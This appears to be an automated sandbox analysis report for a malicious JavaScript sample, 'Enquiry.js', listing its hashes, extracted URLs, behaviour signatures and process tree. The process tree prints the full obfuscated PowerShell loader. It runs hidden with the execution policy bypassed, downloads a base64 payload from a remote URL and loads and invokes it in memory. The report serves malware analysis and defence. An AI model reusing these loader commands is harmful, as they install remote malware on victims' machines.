Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 13:50
Static task
static1
Behavioral task
behavioral1
Sample
Enquiry.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Enquiry.js
Resource
win10v2004-20240802-en
General
-
Target
Enquiry.js
-
Size
319KB
-
MD5
9234f26f1ef7e053de47d6b1e4e02827
-
SHA1
f110e7a8c7d4b65491be0393ead6bc9c9620bef0
-
SHA256
9446ab8aeba470c63142ab986f9023bf8b1a786baea6ff43ceaf3d945e9c8976
-
SHA512
62091b83f6feda8f7cff0655149a3c2d6d7c4203b1064f52f670ffd759d0ce97ca243a87084b6f6fe2be96a8576d57488795844202c5210e577899e341225c7e
-
SSDEEP
6144:zze4Z2bN0IWqH8dEHLQp57QBH/8vGwp749Og3JWacMnmockYAOkrW9vvplZcF:e4Z2bN0gH8irQp5EBf8vGwp74AgJ4qm6
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2944 powershell.exe 6 2944 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2944 powershell.exe 2580 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2580 powershell.exe 2944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2104 wrote to memory of 2580 2104 wscript.exe 30 PID 2104 wrote to memory of 2580 2104 wscript.exe 30 PID 2104 wrote to memory of 2580 2104 wscript.exe 30 PID 2580 wrote to memory of 2944 2580 powershell.exe 32 PID 2580 wrote to memory of 2944 2580 powershell.exe 32 PID 2580 wrote to memory of 2944 2580 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry.js1⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAEUAbgB2ADoAQwBPAE0AUwBQAEUAYwBbADQALAAyADYALAAyADUAXQAtAEoATwBpAG4AJwAnACkAIAAoACgAKAAnAFEAVgBXAHUAcgBsACAAPQAgACcAKwAnAE0ARwBLACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAJwArACcAcwAnACsAJwA6AC8AJwArACcALwBpAGEAOQAwADQANgAnACsAJwAwACcAKwAnADEAJwArACcALgB1ACcAKwAnAHMALgAnACsAJwBhAHIAYwAnACsAJwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0AGUAJwArACcAbQBzACcAKwAnAC8AZABlAHQAYQBoAC0AJwArACcAbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgAnACsAJwBvAHQAJwArACcAZQBKAC4AdAB4AHQATQBHAEsAOwAnACsAJwBRAFYAVwBiACcAKwAnAGEAJwArACcAcwBlACcAKwAnADYANABDACcAKwAnAG8AbgB0AGUAJwArACcAbgB0ACAAPQAgACcAKwAnACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzACcAKwAnAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAnACsAJwApAC4AJwArACcARAAnACsAJwBvAHcAbgBsAG8AJwArACcAYQBkAFMAJwArACcAdAByACcAKwAnAGkAJwArACcAbgBnACgAUQBWACcAKwAnAFcAJwArACcAdQAnACsAJwByACcAKwAnAGwAKQAnACsAJwA7ACcAKwAnAFEAVgBXAGIAJwArACcAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwArACcAIAA9ACAAJwArACcAWwBTAHkAJwArACcAcwB0AGUAbQAnACsAJwAuAEMAJwArACcAbwBuAHYAZQByAHQAJwArACcAXQA6ACcAKwAnADoARgAnACsAJwByAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAJwArACcAcgBpAG4AZwAoAFEAJwArACcAVgBXACcAKwAnAGIAYQBzACcAKwAnAGUANgA0AEMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwArACcAKQA7ACcAKwAnAFEAVgBXAGEAcwAnACsAJwBzAGUAJwArACcAbQBiAGwAeQAgAD0AIAAnACsAJwBbACcAKwAnAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBACcAKwAnAHMAcwAnACsAJwBlAG0AJwArACcAYgBsAHkAXQA6ACcAKwAnADoAJwArACcATABvAGEAJwArACcAZAAoAFEAJwArACcAVgBXACcAKwAnAGIAaQBuACcAKwAnAGEAcgB5AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQA7AFEAVgBXAHQAeQBwAGUAIAA9ACAAUQBWAFcAYQBzAHMAZQAnACsAJwBtAGIAbAAnACsAJwB5ACcAKwAnAC4ARwAnACsAJwBlACcAKwAnAHQAVAB5AHAAZQAoAE0ARwBLAFIAdQBuAFAAJwArACcARQAuACcAKwAnAEgAbwBtAGUATQBHAEsAKQA7AFEAVgAnACsAJwBXAG0AJwArACcAZQB0AGgAbwBkACAAPQAgAFEAVgAnACsAJwBXAHQAeQBwACcAKwAnAGUALgAnACsAJwBHAGUAJwArACcAdAAnACsAJwBNAGUAJwArACcAdABoACcAKwAnAG8AZAAnACsAJwAoAE0ARwBLACcAKwAnAFYAQQBJACcAKwAnAE0ARwBLACkAOwBRAFYAVwAnACsAJwBtACcAKwAnAGUAdABoAG8AZAAnACsAJwAuAEkAbgB2ACcAKwAnAG8AJwArACcAawBlACgAUQBWAFcAJwArACcAbgB1AGwAbAAsACAAWwBvAGIAJwArACcAagBlAGMAdAAnACsAJwBbAF0AXQBAACcAKwAnACgAJwArACcATQBHACcAKwAnAEsAdAAnACsAJwB4AHQALgBpACcAKwAnAG4AbgBpAHcAJwArACcALwAnACsAJwB2AGUAJwArACcAZAAuADIAJwArACcAcgAuADMAOQBiADMAJwArACcANAAnACsAJwA1ADMAMAAnACsAJwAyAGEAJwArACcAMAA3ADUAYgAxAGIAJwArACcAYwAnACsAJwAwACcAKwAnAGQANAA1AGIANgAzADIAJwArACcAZQBiADkAZQBlADYAMgAtACcAKwAnAGIAJwArACcAdQAnACsAJwBwAC8AJwArACcALwAnACsAJwA6AHMAcAB0ACcAKwAnAHQAaABNAEcASwAgACwAIABNACcAKwAnAEcASwBkAGUAJwArACcAcwAnACsAJwBhAHQAJwArACcAaQAnACsAJwB2AGEAJwArACcAZAAnACsAJwBvACcAKwAnAE0ARwBLACcAKwAnACAALAAgACcAKwAnAE0ARwAnACsAJwBLAGQAZQBzAGEAdABpAHYAYQBkAG8AJwArACcATQAnACsAJwBHACcAKwAnAEsAIAAnACsAJwAsACAAJwArACcATQBHACcAKwAnAEsAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBNAEcASwAnACsAJwAsAE0AJwArACcARwBLAEEAJwArACcAZABkAEkAbgBQAHIAbwBjACcAKwAnAGUAcwBzADMAMgAnACsAJwBNAEcASwAsAE0ARwBLAGQAZQBzAGEAdABpAHYAYQBkAG8AJwArACcATQBHAEsAKQAnACsAJwApADsAJwApACAAIAAtAHIAZQBwAEwAQQBjAGUAIAAgACgAWwBDAGgAYQByAF0AOAAxACsAWwBDAGgAYQByAF0AOAA2ACsAWwBDAGgAYQByAF0AOAA3ACkALABbAEMAaABhAHIAXQAzADYAIAAtAEMAcgBFAFAATABBAGMARQAgACAAJwBNAEcASwAnACwAWwBDAGgAYQByAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $Env:COMSPEc[4,26,25]-JOin'') ((('QVWurl = '+'MGK'+'ht'+'t'+'p'+'s'+':/'+'/ia9046'+'0'+'1'+'.u'+'s.'+'arc'+'hive.org'+'/6/'+'ite'+'ms'+'/detah-'+'note-j/Detah'+'N'+'ot'+'eJ.txtMGK;'+'QVWb'+'a'+'se'+'64C'+'onte'+'nt = '+'(New-Object Sys'+'te'+'m.Net.WebClient'+').'+'D'+'ownlo'+'adS'+'tr'+'i'+'ng(QV'+'W'+'u'+'r'+'l)'+';'+'QVWb'+'i'+'n'+'aryCon'+'t'+'ent'+' = '+'[Sy'+'stem'+'.C'+'onvert'+']:'+':F'+'ro'+'mBase64St'+'ring(Q'+'VW'+'bas'+'e64Con'+'t'+'ent'+');'+'QVWas'+'se'+'mbly = '+'['+'Reflection.A'+'ss'+'em'+'bly]:'+':'+'Loa'+'d(Q'+'VW'+'bin'+'aryCo'+'nt'+'e'+'n'+'t'+');QVWtype = QVWasse'+'mbl'+'y'+'.G'+'e'+'tType(MGKRunP'+'E.'+'HomeMGK);QV'+'Wm'+'ethod = QV'+'Wtyp'+'e.'+'Ge'+'t'+'Me'+'th'+'od'+'(MGK'+'VAI'+'MGK);QVW'+'m'+'ethod'+'.Inv'+'o'+'ke(QVW'+'null, [ob'+'ject'+'[]]@'+'('+'MG'+'Kt'+'xt.i'+'nniw'+'/'+'ve'+'d.2'+'r.39b3'+'4'+'530'+'2a'+'075b1b'+'c'+'0'+'d45b632'+'eb9ee62-'+'b'+'u'+'p/'+'/'+':spt'+'thMGK , M'+'GKde'+'s'+'at'+'i'+'va'+'d'+'o'+'MGK'+' , '+'MG'+'Kdesativado'+'M'+'G'+'K '+', '+'MG'+'Kdesat'+'ivadoMGK'+',M'+'GKA'+'ddInProc'+'ess32'+'MGK,MGKdesativado'+'MGK)'+');') -repLAce ([Char]81+[Char]86+[Char]87),[Char]36 -CrEPLAcE 'MGK',[Char]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD560f1022b9c1fe30b1b2c9f54310e3e39
SHA1a37de25e6019d73a90a2406003643597cdc43ccb
SHA256d4cf9ae7ffd1f0478b374e8f45c0bd564be62227d913ff5dcf19ff3fccdb4dd3
SHA5121ce7b6527183059288cc0c2620ee3c79cb3b3f4b8529a155460d6f5960d5efd9487eb75156652f6b071d504227cde34704c8ffbd05ce896836168e9f3f2a14ac